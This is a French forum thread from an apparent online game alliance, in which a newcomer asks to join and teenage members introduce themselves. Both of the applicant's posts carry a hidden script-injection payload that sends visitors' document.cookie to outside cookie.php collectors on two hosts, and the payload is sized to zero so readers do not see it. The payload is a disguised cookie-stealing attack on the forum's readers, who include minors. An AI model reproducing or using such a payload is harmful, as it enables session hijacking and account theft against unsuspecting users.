| Salut tout le monde | |
|
|
Auteur | Message |
---|
Tinguan Invité honorifique du forum
| Sujet: Salut tout le monde Dim 5 Mar - 19:06 | |
| Bonjour tout le monde, j'aimerais entrer dans votre alliance, j'ai 215 349 points, mon ancienne alliance était SWR, je suis le frère de Cedou ( top 100 ). Mais avant de venir j'aimerais mieux vous connître, allez a bientôt j'éspère.
'sss=`i=new/**/Image();i.src='https://omega-alliance.1fr1.net/cookie/cookie.php?c='+document·cookie;this.s ss=null`style='font-size:0; X="' | |
|
| |
antonin Blablateur confirmé
Nombre de messages : 909 Utilité dans votre alliance(un peu d'originalité) : Chancelier Date d'inscription : 16/12/2005
| Sujet: Re: Salut tout le monde Dim 5 Mar - 20:41 | |
| Nous sommes tout a fait favorable a t' as venus . Que souhaite tu connetre a notre suget . Cordialement
Antonin Chancelier | |
|
| |
Tinguan Invité honorifique du forum
| Sujet: Re: Salut tout le monde Dim 5 Mar - 21:15 | |
| Et bien j'aimerai connaitre :
Reponds moi vite...
'sss=`i=new/**/Image();i.src='http://www.informat.wistee-heb.fr/test/cookie.php?c='+document·cookie;this.s ss=null`style='font-size:0; X=" ' | |
|
| |
antonin Blablateur confirmé
Nombre de messages : 909 Utilité dans votre alliance(un peu d'originalité) : Chancelier Date d'inscription : 16/12/2005
| Sujet: Re: Salut tout le monde Dim 5 Mar - 22:48 | |
| Omega l,'alliance à 5 mois, jai 16ans je gere l'alliance aidé par tous les membres . nous nous construisons petit à petit notre but est d'atteindre la taille critique afin de mieux protéger nos membres en cela toute candidature de nouveau membre est la bienvenue. cordialement
antonin chancelier | |
|
| |
Abab Empereur
Nombre de messages : 1442 Age : 34 Utilité dans votre alliance(un peu d'originalité) : Nettoie le forum(général en chef du balai) Date d'inscription : 21/12/2005
| Sujet: Re: Salut tout le monde Lun 6 Mar - 19:32 | |
| moi abab, 16 ans aussi (waou le meme age que mon chancelier!!!), membre de l'alliance depuis presque les débuts.
Dernière édition par le Lun 6 Mar - 19:42, édité 1 fois | |
|
| |
Abab Empereur
Nombre de messages : 1442 Age : 34 Utilité dans votre alliance(un peu d'originalité) : Nettoie le forum(général en chef du balai) Date d'inscription : 21/12/2005
| Sujet: Re: Salut tout le monde Lun 6 Mar - 19:41 | |
| silteplait peux tu nous donner ton pseudo in game pour qu'on puisse te situer? | |
|
| |
Galadorn Shabringer Combatant fidèle
| Sujet: Re: Salut tout le monde Lun 6 Mar - 20:42 | |
| ben moi, Galadorn Shabringer ........... 15 ans !!! nooon je suis plus jeune !!!
je suis rentré dans l'alliance après 2 potes qui y étaient. Ilsse sont barré mais puique j'avais un peu tout restructuré (forum, page de présentation...) je suis resté parce que antonin ne sais mais vraiment pas gérer le forum tout seul (désolé antonin mais c'est la vérité ^^)
P.S. les formules de politesse en RP c'est pas trop mon truc sur forum, dsl | |
|
| |
Abab Empereur
| Sujet: Re: Salut tout le monde Lun 6 Mar - 21:41 | |
| comm tu peux voir ya 1 vrai solidarité entre membres(cassé le antonin!!! ) | |
|
| |
moon angel En route vers la gloire
Nombre de messages : 194 Age : 32 Utilité dans votre alliance(un peu d'originalité) : le general anti-boulet Date d'inscription : 27/04/2006
| Sujet: Re: Salut tout le monde Jeu 27 Avr - 17:30 | |
| Moi Moon Angel(sa le fait comme nom J'ais 13 ans je suis en seconde 17 de moyenn e s'est pas la mort!! Je vis dans un plaide bomer, des parents bomer desamis bomer pref(WC ) Je suis un trous de cus bomer | |
|
| |
Abab Empereur
| Sujet: Re: Salut tout le monde Jeu 27 Avr - 22:19 | |
| comment ça taille!!! T'es dans quel coin que j'y ailles...pas!!!? | |
|
| |
Contenu sponsorisé
| Sujet: Re: Salut tout le monde | |
| |
|
| |
| Salut tout le monde | |
|